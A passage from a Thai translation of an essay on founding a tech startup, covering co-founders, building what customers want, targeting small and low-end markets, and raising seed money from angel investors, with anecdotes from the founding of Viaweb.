ในบริษัทเพียงลำพังโดยไม่มีคนช่วยไตร่ตรองมีโอกาสพลาดสูง แม้แต่คนฉลาดสุดขั้วอย่างบิล เกตส์ ก็ยังต้องมีเพื่อนร่วมก่อตั้งบริษัทอยู่ดี ในทางกลับกัน ผู้ก่อตั้งบริษัทไม่ควรมีจำนวนเยอะเกินไป เรามาตั้งบริษัท ไม่ได้ระดมเพื่อนมาถ่ายรูปหมู่ให้เยอะๆ ดูเท่ๆ เพราะการมีผู้ร่วมก่อตั้งบริษัทเยอะเท่าไร แปลว่ายิ่งมีเรื่องที่เห็นไม่ตรงกันมากเท่านั้น การมีผู้ก่อตั้งบริษัทเพียง 2-3 คนสามารถยุติข้อขัดแย้งระหว่างกันได้เร็ว แต่การมีคน 7-8 คนอาจทำให้บริษัทแยกเป็นฝักฝ่ายได้ บริษัทหน้าใหม่ต้องไม่โหวตเพื่อหามติ แต่ต้องทำงานโดยทุกคนเห็นร่วมกันอย่างเอกฉันท์เท่านั้น สำหรับบริษัทสตาร์ตอัพส่วนมากที่ทำงานธุรกิจด้านเทคโนโลยี ผู้ก่อตั้งบริษัทควรมีคนสายเทคนิครวมอยู่ด้วย ในอดีตสมัยฟองสบู่ดอตคอมบูม (ก่อนฟองสบู่แตกในปี 2001 - ผู้แปล) มีบริษัทหลายแห่งที่ผู้ก่อตั้งเป็นนักธุรกิจล้วนๆ ใช้วิธีจ้างแฮ็กเกอร์มาเขียนโปรแกรมให้ วิธีการแบบนี้ไม่ค่อยเวิร์ค เพราะคนจากฝั่งธุรกิจไม่เข้าใจเรื่องเทคโนโลยี ไม่รู้ว่าเวลาเจอปัญหาทางเทคนิคแล้วมีทางเลือกอะไรบ้าง ไม่รู้ว่าปัญหานี้ยากหรือง่าย ทำให้ตัดสินใจผิดพลาดได้ง่าย แถมคนเหล่านี้ก็ไม่สามารถแยกแยะได้ว่าแฮ็กเกอร์ที่ตัวเองจ้างนั้นเก่งจริงหรือไม่ด้วย (แฮ็กเกอร์ด้วยกันเองยังแยกแยะได้ยาก สำหรับนักธุรกิจแล้วจึงถือเป็นการเดาสุ่มก็ว่าได้) คำถามในมุมกลับกันคือ กลุ่มผู้ก่อตั้งบริษัทควรมีคนจากฟากธุรกิจด้วยหรือไม่ คำตอบของคำถามนี้ขึ้นกับสถานการณ์ ตอนผมตั้งบริษัทก็ถามคำถามนี้กับตัวเองเหมือนกัน และได้ลองไปทาบทามกับคนที่เราคิดว่าเขาเป็นคน "เข้าใจธุรกิจ" ว่าอยากมาเป็นประธานบริษัทหรือเปล่า ปรากฏว่าพวกเขาปฏิเสธ ผมเลยต้องทำงานด้านธุรกิจด้วยตัวเอง สิ่งที่ผมค้นพบคือคำว่า "ธุรกิจ" ไม่มีอะไรที่ซับซ้อน ไม่เหมือนกับวงการฟิสิกส์หรือการแพทย์ที่ต้องเรียนตามหลักสูตรกันหลายปี แก่นสำคัญของ "ธุรกิจ" คือการทำให้คนยอมจ่ายเงินซื้อสินค้าของเรา ก็เท่านั้น ผมคิดว่าเหตุผลลึกๆ ที่ทำให้ผมคิดว่า “ธุรกิจ” เป็นเรื่องลึกลับซับซ้อน เกิดจากอุดมคติของตัวผมเองในอดีต ที่พยายามไม่ยุ่งเกี่ยวกับการทำธุรกิจใดๆ ผมอยากทำงานที่บริสุทธิ์ อยู่ในโลกแห่งซอฟต์แวร์ที่เต็มไปด้วยความรู้ ไม่ใช่การทำงานแบบที่ต้องวุ่นวายกับลูกค้า คนที่ไม่ต้องการให้ตัวเองไปยุ่งกับงานแบบนี้มักพัฒนา “กำแพง” ขึ้นมาปกป้องตัวเอง Paul Erdos (นักคณิตศาสตร์ชาวฮังการเรียน มีชื่อเสียงเรื่องบุคลิกที่แปลกพิสดาร - ผู้แปล) เก่งในเรื่องแบบนี้ นิสัยของเขาไม่มีวันเดินไปซื้อผลเกรปฟรุตที่ร้าน แต่แม้กระทั่งการผ่ามันออกเป็นซีก เขายังทำไม่ได้ และบังคับให้คนอื่นทำแทน เพื่อให้เขามีเวลาว่างไปคิดเรื่องสมการคณิตศาสตร์ กรณีของ Erdos ถือเป็นกรณีที่โดดเด่นเป็นพิเศษ แต่สามีส่วนใหญ่ก็มักอ้างแบบนี้กับภรรยากันทั้งนั้น เมื่อผมถูกบังคับให้ทิ้ง “กำแพง” ว่าตัวเองไม่สามารถทำงานด้านธุรกิจได้ ผมก็ค้นพบว่า “ธุรกิจ” ไม่ได้ยากและไม่ได้น่าเบื่ออย่างที่คิด แน่นอนว่ามีงานบางอย่างในโลกธุรกิจที่อาจยากและต้องใช้ความเชี่ยวชาญพิเศษ อย่างเช่น กฎหมายภาษี หรือการคำนวณราคาอนุพันธ์ในตลาดหุ้น แต่คุณไม่จำเป็นต้องรู้เรื่องพวกนี้หรอก สิ่งที่คุณต้องรู้ในการทำธุรกิจสำหรับสตาร์ตอัพคือ คอมมอนเซนส์ทั่วๆ ไป ที่คนส่วนใหญ่รู้กันอยู่แล้ว ก่อนที่โลกจะมีวิชา MBA หรือมีมหาวิทยาลัยด้วยซ้ำ ถ้าคุณลองไล่ชื่อมหาเศรษฐีของโลกจากอันดับ Forbes 400 ลองหาดูว่าใครจบ MBA บ้าง คุณจะพบข้อเท็จจริงที่น่าสนใจ เพราะถัดจาก Warren Buffet แล้ว เศรษฐีอันดับถัดไปที่จบ MBA อยู่ที่อันดับ 22 เขาคือ Phil Knight ซีอีโอของไนกี้ และใน 50 อันดับแรก มีคนที่จบ MBA เพียงแค่ 5 คนเท่านั้น สิ่งที่น่าสนใจกว่าคือเศรษฐีใน Forbes 400 มีคนที่จบการศึกษาหรือมีพื้นฐานมาจากสายเทคนิคเป็นจำนวนมาก เช่น Bill Gates, Steve Jobs, Larry Ellison, Michael Dell, Jeff Bezos, Gordon Moore ผู้ก่อตั้งบริษัทเทคโนโลยีพวกนี้มีมักจบการศึกษาสายเทคโนโลยี ไม่ใช่สายธุรกิจ ดังนั้นถ้าคุณมีเวลา 2 ปี และอยากให้ตัวเองประสบความสำเร็จทางธุรกิจ จากข้อมูลพวกนี้คุณน่าจะเห็นว่าควรหัดเขียนโปรแกรมมากกว่าเรียน MBA \[3\] เหตุผลข้อเดียวที่คุณควรดึงคนสายธุรกิจมาทำงานในสตาร์ตอัพ คือการหาใครสักคนที่ยินดีมาทำหน้าที่รับฟังความเห็นจากลูกค้า บางคนเชื่อว่างานแบบนี้มีแต่นักธุรกิจเท่านั้นที่ทำได้ เพราะแฮ็กเกอร์มีหน้าที่สร้างซอฟต์แวร์ แต่ไม่ใช่คนออกแบบมัน ผมว่าความคิดแบบนี้ไร้สาระ การเขียนโปรแกรมเป็นไม่มีความเกี่ยวข้องกับการไม่ยอมเข้าใจลูกค้าเลย และนักธุรกิจที่เขียนโปรแกรมไม่เป็น ก็ไม่ได้แปลว่าจะเข้าใจลูกค้าเสมอไป ถ้าคุณไม่สามารถพูดคุยเพื่อเข้าใจลูกค้าได้ คุณควรหัดเสียตั้งแต่วันนี้ หรือไม่ก็หาเพื่อนที่ทำงานแบบนี้เป็นมาช่วยตั้งบริษัท เพราะนี่เป็นเรื่องสำคัญมากๆ เรื่องหนึ่งของบริษัทเทคโนโลยีหน้าใหม่ทั้งหลาย และบริษัทที่กิจการล้มเหลวก็มักเกิดจากเรื่องนี้เป็นสำคัญ ## สิ่งที่ลูกค้าต้องการ ไม่ใช่มีแต่สตาร์ตอัพหรอกที่ต้องใส่ใจเรื่องนี้ เพราะธุรกิจใดๆ ที่ล้มเหลวก็เกิดจากบริษัทไม่สามารถสร้างสิ่งที่ลูกค้าต้องการได้ ดูตัวอย่างจากร้านอาหารจะชัดเจนที่สุด มีร้านอาหารจำนวนมากที่ล้มเหลวทางธุรกิจ อาจจะสัก 1 ใน 4 ของร้านที่เปิดใหม่ในปีแรก แต่คุณนึกชื่อร้านอาหารที่อร่อยแล้วยังเจ๊งออกหรือเปล่า? ร้านอาหารอร่อยๆ ส่วนใหญ่มักจะไปรุ่ง ถึงแม้ว่าร้านนั้นจะขายแพง คนเยอะ เสียงดัง สกปรก หลบซ่อนอยู่ในซอกหลืบ หรือบริการแย่ แต่คนก็ยังไปกินกันอย่างล้นเหลาม บางทีเราอาจเห็นร้านอาหารที่รสชาติธรรมดาแต่มีลูกค้าเยอะด้วยกลเม็ดด้านการประชาสัมพันธ์บางอย่าง แต่วิธีนี้เสี่ยงและไม่ยั่งยืน วิธีที่ดีกว่านั้นคือทำอาหารให้อร่อยเป็นพอ ตรงไปตรงมามาก โลกเทคโนโลยีก็เหมือนกัน คุณอาจเคยได้ยินร้อยแปดเหตุผลที่ทำให้บริษัทเจ๊ง แต่คุณนึกชื่อบริษัทที่มีผลิตภัณฑ์ฮิตสุดๆ แล้วยังเจ๊งออกไหมครับ ปัญหาที่แท้จริงของบริษัทสตาร์ตอัพเกือบทุกแห่งที่ล้มเหลว เกิดจากว่าลูกค้าไม่ต้องการผลิตภัณฑ์ของบริษัทนั้นๆ ถึงแม้ในทางเอกสารแล้ว บริษัทจะระบุเหตุผลที่เลิกกิจการว่า “เงินทุนหมด” ก็ตาม แต่มันเป็นปัญหาที่สามารถแก้ไขได้ ถ้าเงินหมดทำไมไม่ขอเงินลงทุนเพิ่ม? คำถามนี้แสดงให้เห็นว่าปัญหาจริงๆ เกิดจากผลิตภัณฑ์ของบริษัทนั้นห่วยเอง หรือไม่ก็เป็นผลิตภัณฑ์ที่ยังไม่เสร็จสมบูรณ์สักที หรือทั้งสองอย่าง ผมเขียนไว้แล้วว่าบริษัทสตาร์ตอัพทุกแห่งควรมีปัจจัย 3 ประการที่จะประสบความสำเร็จ แต่ตอนแรกผมเกือบใส่ปัจจัยข้อที่ 4 ลงไปแล้ว ปัจจัยข้อนี้คือ “ออกผลิตภัณฑ์เวอร์ชัน 1 ให้เร็วที่สุดเท่าที่ทำได้” แต่สุดท้ายผมตัดสินใจไม่ใส่ เพราะถือว่ามันเป็นส่วนหนึ่งของปัจจัยข้อ 2 เรื่องการสร้างสิ่งที่ลูกค้าต้องการอยู่แล้ว เรามีเพียงวิธีเดียวที่จะเข้าใจว่าลูกค้าต้องการอะไรกันแน่ คือการสร้างผลิตภัณฑ์รุ่นต้นแบบมาให้ลูกค้าลองใช้ และปรับปรุงมันโดยอิงจากความเห็นของลูกค้า ในโลกของบริษัทไอที มีกลยุทธ์แบบหนึ่งที่ผมเรียกมันว่า "หวังฟลุค" หรือ “Hail Mary” (อิงจากชื่อเรียกของกลยุทธ์ในอเมริกันฟุตบอล - ผู้แปล) ตามกลยุทธ์แบบนี้ คุณต้องวางแผนพัฒนาผลิตภัณฑ์ แล้วจ้างทีมวิศวกรมาพัฒนามันขึ้นมา (คนที่ใช้กลยุทธ์นี้มักเรียกแฮ็กเกอร์ว่า “วิศวกร”) แต่สุดท้ายแล้วเมื่อเวลาผ่านไป 1 ปี เจ้าของบริษัทจะพบว่าหมดเงินลงทุนไปแล้ว 2 ล้านดอลลาร์ เพื่อได้ผลิตภัณฑ์ที่ไม่มีใครต้องการ มีคนใช้กลยุทธ์แบบนี้ไม่น้อยในช่วงฟองสบู่ดอตคอม โดยเฉพาะกลุ่มบริษัทที่เกิดจากนักธุรกิจที่คิดว่าการพัฒนาซอฟต์แวร์เป็นเรื่องน่ากลัว จนต้องวางแผนเป็นอย่างดีถึงจะสำเร็จได้ เราไม่เคยแม้แต่จะคิดถึงกลยุทธ์แบบนี้ ตัวผมเป็นโปรแกรมเมอร์ภาษา Lisp และคุ้นเคยกับธรรมเนียมการสร้างโปรแกรมต้นแบบ (rapid prototyping) เป็นอย่างดี ผมจะไม่บอกว่านี่เป็นวิธีที่เหมาะกับการสร้างซอฟต์แวร์ทุกชนิดในโลก แต่มันเป็นวิธีการที่ดีที่สุดในการสร้างซอฟต์แวร์ของบริษัทหน้าใหม่ เพราะแผนการตั้งต้นของคุณต้องมีอะไรผิดสักอย่างอยู่แล้ว ดังนั้นสิ่งที่คุณควรทำเป็นอันดับแรกสุดคือหาว่ามันผิดตรงไหน และวิธีการค้นหาว่าแผนการของเรามีอะไรพลาดก็คือลองทำตามแผนเพื่อดูว่าของจริงๆ มันเป็นอย่างไรกันแน่ บริษัทของผมก็ไม่ต่างจากบริษัทสตาร์ตอัพอื่นๆ เราเปลี่ยนแผนระหว่างทาง ตอนแรกเราคาดว่าลูกค้าของเราคือบริษัทรับสร้างเว็บ แต่ในไม่ช้าเราก็พบว่าพวกเขาไม่ชอบเรา เพราะซอฟต์แวร์ของเราช่วยสร้างเว็บได้ง่ายมาก แถมเรายังรับโฮสต์เว็บไซต์ด้วย จึงมีโอกาสสูงที่ลูกค้าอาจจะเลิกจ้างพวกเขาและหันมาใช้บริการของเราแทน นอกจากนี้ เดิมทีเรายังคิดว่าจะได้ลูกค้าเป็นบริษัทแคตตาล็อกสินค้า เพราะการขายสินค้าออนไลน์ย่อมเป็นสิ่งที่บริษัทเหล่านี้ควรทำ แต่สถานการณ์ในปี 1996 มันกลับเป็นเรื่องยากกว่าที่คิด ผู้จัดการระดับกลางของบริษัทแคตตาล็อกเหล่านี้ไม่ได้มองว่าเว็บเป็นโอกาสทางธุรกิจ แต่มันคือภาระงานที่เพิ่มขึ้น ลูกค้าของเราในช่วงแรกจึงมีเพียงบริษัทแคตตาล็อกกล้าได้กล้าเสียเพียงไม่กี่ราย (หนึ่งในนั้นคือ Frederick's of Hollywood ซึ่งสอนประสบการณ์อันมีค่ากับเราว่าจะแก้ปัญหาเรื่องโหลดหนักๆ ของเซิร์ฟเวอร์ได้อย่างไร) ลูกค้าของเราส่วนใหญ่เป็นพ่อค้ารายย่อยที่มองว่าเว็บเป็นโอกาสในการสร้างธุรกิจ บางคนมีร้านจริงๆ ของตัวเองอยู่แล้ว แต่หลายรายก็มีเฉพาะหน้าร้านออนไลน์ เราจึงเปลี่ยนมาเน้นลูกค้ากลุ่มนี้ แทนการเจาะตลาดผู้รับทำเว็บหรือบริษัทแคตตาล็อกแบบที่คิดไว้ในตอนแรก และมันช่วยบีบให้เราออกแบบซอฟต์แวร์ให้ง่ายที่สุดเท่าที่จะทำได้ ผมได้บทเรียนอันทรงคุณค่าจากเรื่องนี้มาก การสร้างเทคโนโลยีให้ใช้ง่ายเป็นเรื่องยากมากๆ แต่ผลลัพธ์ที่ได้จะคุ้มค่าเสมอ แฮ็กเกอร์ส่วนใหญ่คุ้นเคยกับคอมพิวเตอร์อยู่แล้ว จึงไม่รู้ว่าคนทั่วไปกลัวการใช้ซอฟต์แวร์ขนาดไหน บรรณาธิการหนังสือของ Stephen Hawking (ศาสตราจารย์ด้านฟิสิกส์ชื่อดัง) บอกเขาว่ายิ่งเขาใส่สมการคณิตศาสตร์ลงไปในหนังสือมากเท่าไร หนังสือยิ่งขายได้น้อยลงไปเท่าตัวต่อทุกสมการ ดังนั้นเมื่อคุณพัฒนาเทคโนโลยีให้ใช้งานง่ายมากขึ้นเท่าไร คุณก็ไต่ไปบนกราฟประชากรสูงขึ้นเท่านั้น ถ้าโปรแกรมใช้ง่ายขึ้น 10% ไม่ได้แปลว่ายอดขายของคุณจะโตขึ้น 10% ตามไปด้วย แต่มันโตขึ้นเท่าตัวเลยต่างหาก ทีนี้คุณจะรู้ได้อย่างไรว่าลูกค้าต้องการอะไร ให้คุณดูพวกเขาตอนกำลังใช้โปรแกรมของเราครับ สถานที่ที่เหมาะสมแห่งหนึ่งคือนิทรรศการเทรดโชว์ทั้งหลาย สำหรับสตาร์ตอัพแล้ว เทรดโชว์ไม่ได้เป็นแหล่งหาลูกค้ารายใหม่ แต่เป็นสถานที่ที่เหมาะสำหรับการวิจัยตลาดของเราเอง เราไม่ได้แค่พรีเซนต์ข้อมูลในงานเทรดโชว์ แต่เราแสดงให้คนเห็นวิธีการสร้างหน้าร้านออนไลน์ที่ใช้งานได้จริง แล้วใช้โอกาสนี้คอยดูว่าคนที่เดินผ่านมา มีวิธีใช้งานซอฟต์แวร์ของเราอย่างไร และลองพูดคุยกับพวกเขาดูว่าพวกเขาอยากได้อะไรจากซอฟต์แวร์ของเราบ้าง ไม่ว่าคุณจะสร้างบริษัทที่ทำธุรกิจประเภทไหน การเข้าใจว่า "ลูกค้าต้องการอะไร" เป็นสิ่งสำคัญมากสำหรับผู้ก่อตั้งบริษัท มีซอฟต์แวร์เพียงประเภทเดียวที่คุณสามารถสร้างได้โดยไม่ต้องศึกษาผู้ใช้ นั่นคือซอฟต์แวร์ชนิดที่คุณเป็นผู้ใช้นั่นล่ะ ตัวอย่างของซอฟต์แวร์เหล่านี้คือระบบปฏิบัติการ ภาษาโปรแกรม ตัวแก้ไขข้อความ ซึ่งส่วนมากก็มีซอฟต์แวร์โอเพนซอร์สให้ใช้อยู่แล้ว ดังนั้นถ้าคุณพัฒนาซอฟต์แวร์เพื่อเงิน คุณก็คงไม่พัฒนาซอฟต์แวร์ให้คนอย่างตัวคุณเองใช้เพียงแค่นั้นหรอก แต่คุณสามารถใช้ประเด็นนี้ตั้งคำถามว่า “คนทั่วไป (ที่ไม่ใช่คนอย่างคุณ) อยากได้อะไรจากเทคโนโลยี” และนี่จะกลายเป็นไอเดียสำหรับบริษัทของคุณได้ เมื่อพูดถึง “สตาร์ตอัพ” คนส่วนใหญ่มักคิดถึงแอปเปิลหรือกูเกิล ทุกคนรู้จักบริษัทเหล่านี้เพราะเป็นแบรนด์ดังที่ผู้บริโภคนิยมใช้ แต่ในความเป็นจริงแล้ว บริษัทดังทุก 1 รายจะมีบริษัทไม่ดังอีก 20 รายที่เจาะตลาดเฉพาะหรือดำเนินธุรกิจอย่างเงียบๆ อยู่เบื้องหลัง ดังนั้นถ้าคุณสร้างบริษัทจนประสบความสำเร็จ คุณก็อาจเป็นหนึ่งในบริษัทไม่ดังเหล่านี้ ถ้าอธิบายในอีกมุมก็คือ ถ้าคุณตั้งใจตั้งบริษัทให้กลายเป็นแบรนด์ดังที่ใครก็รู้จัก โอกาสที่จะประสบความสำเร็จจะลดลง เพราะโอกาสในการแข่งขันอยู่ในตลาดเฉพาะทาง (niche market) เนื่องจากแนวคิดพื้นฐานของสตาร์ตอัพคือทำเงินจากผลิตภัณฑ์ที่ทำงานได้ดีกว่าสิ่งที่มีอยู่ในปัจจุบัน ดังนั้นตลาดที่เหมาะที่สุดคืออุตสาหกรรมที่ทุกอย่างแย่ไปหมด และในโลกนี้ไม่มีอะไรแย่ไปกว่าฝ่ายไอทีในองค์กรอีกแล้ว คุณรู้หรือไม่ว่าปีหนึ่งๆ บริษัททั่วโลกจ่ายเงินค่าซอฟต์แวร์ไปมากแค่ไหน และได้ผลลัพธ์อะไรกลับมาสมกับที่ลงทุนไปหรือไม่ ความไม่สมดุลย์นี้แหละคือโอกาสของเรา ถ้าคุณอยากได้ไอเดียสำหรับสตาร์ตอัพ คุณลองไปนั่งในบริษัทขนาดกลางที่ไม่ใช่บริษัทไอทีโดยตรง ลองเฝ้าดูว่าคนในบริษัทใช้คอมพิวเตอร์อย่างไรบ้างเป็นเวลาสักสองสามสัปดาห์ แฮ็กเกอร์ส่วนมากมักไม่ค่อยรู้ว่าวงการนี้ย่ำแย่แค่ไหน เฉกเช่นเดียวกับเศรษฐีอเมริกันนึกภาพสลัมในบราซิลไม่ออกยังไงยังงั้น คุณควรเริ่มเขียนซอฟต์แวร์สำหรับบริษัทขนาดเล็กก่อน เพราะการขายของให้บริษัทระดับนี้ทำได้ง่ายกว่า ผมไม่เถียงว่าการวางเป้าหมายเพื่อขายของให้บริษัทใหญ่งบประมาณเยอะเป็นเรื่องดี แต่สมมติว่าคุณสามารถพัฒนาซอฟต์แวร์ได้เก่งกว่า Oracle ในบางด้าน คุณก็ไม่มีวันขายของสู้กับเซลส์ของ Oracle ได้แน่นอน ดังนั้นถ้าอยากเอาชนะด้วยเทคโนโลยีที่ดีกว่า จงมองหาลูกค้ารายเล็กๆ เอาไว้ก่อน \[4\] ตลาดแต่ละระดับมีมูลค่าที่ต่างกันไป ในโลกของเทคโนโลยี ตลาดล่างจะกินส่วนแบ่งตลาดบนเสมอ การสร้างผลิตภัณฑ์ราคาถูกให้มีความสามารถเยอะๆ ทำได้ง่ายกว่าการปรับผลิตภัณฑ์ในตลาดบนให้มีราคาถูกลง ดังนั้นผลิตภัณฑ์ของคุณควรมีราคาไม่แพงในตอนแรก สามารถทำงานพื้นฐานได้ครบถ้วน แล้วค่อยๆ พัฒนาให้มันมีความสามารถมากขึ้นเรื่อยๆ เฉกเช่นระดับน้ำในห้องที่ค่อยๆ เพิ่มขึ้นจนแตะ “เพดาน” หรือผลิตภัณฑ์รุ่นท็อปในท้องตลาด ตัวอย่างในอดีตคือ ซันสร้างคอมพิวเตอร์เมนเฟรม และอินเทลก็กินตลาดของซัน, Microsoft Word กินตลาดซอฟต์แวร์จัดหน้าเอกสารอย่าง Interleaf และ Framemaker, กล้องดิจิทัลราคาถูกกำลังกินตลาดกล้องราคาแพงสำหรับมืออาชีพ, Avid กินตลาดระบบตัดต่อวิดีโอสำหรับมืออาชีพ และตอนนี้แอปเปิลก็กำลังกินตลาดของ Avid, เฮนรี ฟอร์ด ก็ทำแบบนี้กับผู้สร้างรถยนต์รุ่นก่อนหน้านั้น คุณจะเห็นว่าถ้าคุณสร้างซอฟต์แวร์ที่เรียบง่าย ราคาถูก คุณจะขายมันได้ง่าย และคุณยังจะอยู่ในสถานะที่ดีที่สุดในการครอบครองตลาดทั้งหมดด้วย การปล่อยให้มีคู่แข่งที่ตั้งราคาถูกกว่าเราเป็นเรื่องอันตรายมาก ถ้าคุณมีผลิตภัณฑ์ที่ราคาถูกที่สุด ใช้ง่ายที่สุด คุณถือว่าอยู่ในด้านล่างสุดของตลาด แต่ถ้าผลิตภัณฑ์ของคุณไม่ถูกที่สุด คุณควรรู้ตัวว่าตกเป็นเป้าของคู่แข่งที่ตั้งราคาได้ถูกกว่าคุณเข้าแล้ว ## การระดมทุน การจะทำทุกอย่างที่ว่ามานี้ได้ คุณจำเป็นต้องมีเงินลงทุน บริษัทหน้าใหม่หลายแห่งใช้เงินทุนส่วนตัว (ตัวอย่างที่ชัดที่สุดคือไมโครซอฟท์) แต่บริษัทส่วนใหญ่มักใช้เงินคนอื่น ผมคิดว่าการขอเงินจากนักลงทุนเป็นเรื่องดีกว่า เพราะการเปิดบริษัทด้วยเงินตัวเองมักต้องเริ่มจากการเป็นบริษัทที่ปรึกษา ซึ่งยากต่อการปรับเปลี่ยนมาเป็นบริษัทผู้พัฒนาผลิตภัณฑ์ในภายหลัง ในทางการเงินแล้ว สตาร์ตอัพเปรียบเสมือนวิชาที่วัดผลแค่สอบผ่านหรือสอบตกเท่านั้น การร่ำรวยจากสตาร์ตอัพคือสร้างโอกาสที่บริษัทจะประสบความสำเร็จให้มากที่สุด ไม่ใช่การขยายสัดส่วนหุ้นที่คุณมีให้มากที่สุด ดังนั้นถ้าคุณสามารถแลกสัดส่วนหุ้นกับอะไรบางอย่างที่ช่วยเพิ่มโอกาสให้คุณประสบความสำเร็จได้ ก็เป็นเรื่องฉลาดถ้าจะทำแบบนั้น แฮ็กเกอร์ส่วนมากมักรู้สึกว่าการขอเงินลงทุนจากนักลงทุนภายนอกเป็นกระบวนการที่น่ากลัวและลึกลับ ในความเป็นจริงแล้วมันแค่ต้องใช้เวลาเยอะสักหน่อย ผมจะอธิบายหลักการว่ามันเป็นอย่างไร อย่างแรกสุดคือคุณต้องมีเงินตั้งต้นหลักหลายหมื่นดอลลาร์ เอาไว้เป็นค่าใช้จ่ายในช่วงที่พัฒนาผลิตภัณฑ์รุ่นต้นแบบ เงินก้อนนี้เรียกว่า seed capital และเนื่องจากมันเป็นเงินจำนวนไม่เยอะนัก การระดมเงิน seed capital จึงง่ายมาก และอย่างน้อยๆ เรามักรู้คำตอบจากนักลงทุนว่าจะได้เงินหรือไม่ได้เงินอย่างรวดเร็ว ไม่ต้องเสียเวลาไปกับมันมากนัก ผู้ที่จ่ายเงิน seed money ให้คุณมักเป็นคนรวยๆ ที่ไม่ใช่บริษัทหรือองค์กร เราเรียกคนเหล่านี้ว่า angel ซึ่งมักเป็นคนที่ร่ำรวยมาจากวงการเทคโนโลยีมาก่อนเช่นกัน ในขั้นตอนนี้ นักลงทุนไม่ได้คาดหวังว่าคุณจะมีแผนการธุรกิจที่เป็นเรื่องเป็นราวอะไร และส่วนใหญ่รู้ว่าต้องตัดสินใจอย่างรวดเร็วว่าจะให้หรือไม่ให้เงิน ซึ่งตามกรณีทั่วไปแล้ว การตัดสินใจลงทุนก็ใช้เวลาไม่เกินหนึ่งสัปดาห์ และใช้เอกสารสัญญาเพียงครึ่งหน้ากระดาษเท่านั้น ตอนนั้นเราเริ่มต้นตั้งบริษัท Viaweb ด้วยเงินลงทุน 10,000 ดอลลาร์จากเพื่อนชื่อ Julian และเอาจริงแล้วเขาช่วยเรามากกว่าการลงเงินมาก Julian เคยเป็นอดีตซีอีโอและยังเป็นนักกฎหมายธุรกิจด้วย เขาเลยมีคำแนะนำที่มีค่าในการทำธุรกิจให้เราเยอะ แถมยังช่วยงานด้านเอกสารต่างๆ สำหรับการจดทะเบียนบริษัท และยิ่งไปกว่านั้นคือเขายังแนะนำเพื่อนนักลงทุนคนอื่นให้เรารู้จัก สำหรับการระดมทุนในรอบถัดไปด้วย นักลงทุน angel บางคน (โดยเฉพาะคนที่มีพื้นฐานทางเทคโนโลยีอยู่ก่อน) อาจแค่ต้องการให้คุณแสดงเดโมและบรรยายปากเปล่าให้เขาฟังว่าเราจะทำอะไรบ้าง แต่นักลงทุนอีกมากมักอยากได้เอกสารแผนธุรกิจของเราด้วย (ถึงแม้บางครั้ง เขาจะแค่เพียงเอาไว้อ่านเตือนใจว่าเขาลงทุนในบริษัทของเราเท่านั้น) ตอนนั้นนักลงทุนบางรายขอเอกสารแผนธุรกิจจากเราเหมือนกัน และเมื่อมองย้อนกลับไปจากวันนี้ ผมก็รู้สึกแปลกใจว่าผมกังวลมากเกินไป เพราะในคำว่า “แผนธุรกิจ” มีคำว่า “ธุรกิจ” อยู่ด้วย ผมเลยคิดไปไกลว่าจะต้องอ่านหนังสือสอนเขียนแผนธุรกิจหรือเปล่านะ ซึ่งจริงๆ แล้วเราไม่ต้องทำอะไรขนาดนั้น ในการระดมทุนช่วงนี้ นักลงทุนเกือบทุกรายต้องการแค่เพียงคำอธิบายสั้นๆ ว่าคุณกำลังจะทำอะไร จะทำเงินจากมันได้อย่างไร และประวัติของผู้ก่อตั้งแต่ละคนเท่านั้น ถ้าคุณนำสิ่งที่คุณพูดให้พวกเขาฟังมาเขียนลงกระดาษ นั่นก็เพียงพอแล้ว คุณไม่น่าจะใช้เวลาเกิน 2-3 ชั่วโมง แถมการนั่งเขียนแผนธุรกิจแบบเป็นเรื่องเป็นราว ก็จะช่วยให้คุณเห็นภาพมากขึ้นว่าคุณกำลังจะทำอะไรและควรทำอะไรต่อไป นักลงทุนบางคนอาจจะยอมลงทุนด้วยก็ต่อเมื่อคุณจดทะเบียนบริษัทแล้ว ขั้นตอนการจดบริษัทไม่ใช่เรื่องยาก สิ่งที่ยากคือคุณต้องตัดสินใจว่าใครเป็นผู้ก่อตั้ง และมีหุ้นคนละเท่าไร ถ้ามีผู้ก่อตั้งสองคน ความสามารถทัดเทียมกัน ทำงานเท่ากัน อันนี้ไม่ยาก แต่ถ้าคุณมีทีมที่ทำงานไม่เท่ากัน การกำหนดสัดส่วนหุ้นจะเริ่มเป็นเรื่องยากขึ้นมา อย่างไรก็ตาม ถ้าคุณตกลงกันได้แล้วว่าจะถือหุ้นคนละเท่าไร สัดส่วนนี้ก็มักจะไม่ค่อยเปลี่ยนแปลงอีกแล้ว ผมไม่มีเทคนิคพิเศษสำหรับการแก้ปัญหานี้ สิ่งที่พอแนะนำได้มีแค่ว่าจงพยายามอย่างเต็มที่ในการกำหนดสัดส่วนให้เหมาะสม อย่างไรก็ตามผมมีกฎส่วนตัวเล็กน้อย เมื่อผู้ก่อตั้งทุกคนรู้สึกว่ากำลังจะได้หุ้นน้อยกว่าที่ควรได้รับ พวกเขาจะทำงานหนักมากขึ้นเพื่อให้ตัวเองได้หุ้นมากขึ้น และสัดส่วนหุ้นนั้นแหละที่เหมาะสม นอกจากการจดทะเบียนบริษัทแล้ว ยังมีงานเอกสารอื่นๆ อีกที่ต้องทำ เช่น ประกัน ขอใบอนุญาตทำธุรกิจ กองทุนประกันสังคม เอกสารที่ต้องส่งสรรพากร ฯลฯ ผมไม่ค่อยแน่ใจว่ามีงานเอกสารอะไรต้องทำบ้าง เพราะเราแทบไม่ได้ทำเองเลย ตอนที่เราได้เงินทุนก้อนใหญ่ช่วงปลายปี 1996 เราก็จ้าง CFO ผู้เก่งฉกาจที่ทำงานเหล่านี้ได้ทุกอย่าง ผมสรุปได้ว่าไม่มีใครมาจับคุณถ้าคุณตกหล่นเอกสารบางอย่างของทางการ นี่เป็นเรื่องดีนะ ไม่อย่างนั้นสตาร์ตอัพจำนวนมากคงไม่ได้เกิดหรอก [5] การจดบริษัทช้าอาจสร้างปัญหาให้คุณได้ เพราะผู้ร่วมก่อตั้งบางคนอาจตัดสินใจแยกตัวไปทำบริษัทลักษณะเดียวกันแทน เรื่องนี้เคยเกิดขึ้นแล้วในวงการ ดังนั้นเมื่อคุณจดบริษัทและกำหนดสัดส่วนหุ้นเรียบร้อย คุณควรจับผู้ร่วมก่อตั้งทุกคนมาเซ็นเอกสารยินยอมว่าไอเดียของทุกคนเป็นของบริษัท และทุกคนจะทำงานกับบริษัทแห่งนี้เพียงแห่งเดียว [ถ้านี่เป็นฉากในหนัง เสียงเพลงชั่วร้ายจะเริ่มดังขึ้นตรงนี้] นอกจากนี้คุณควรถามเพื่อนๆ 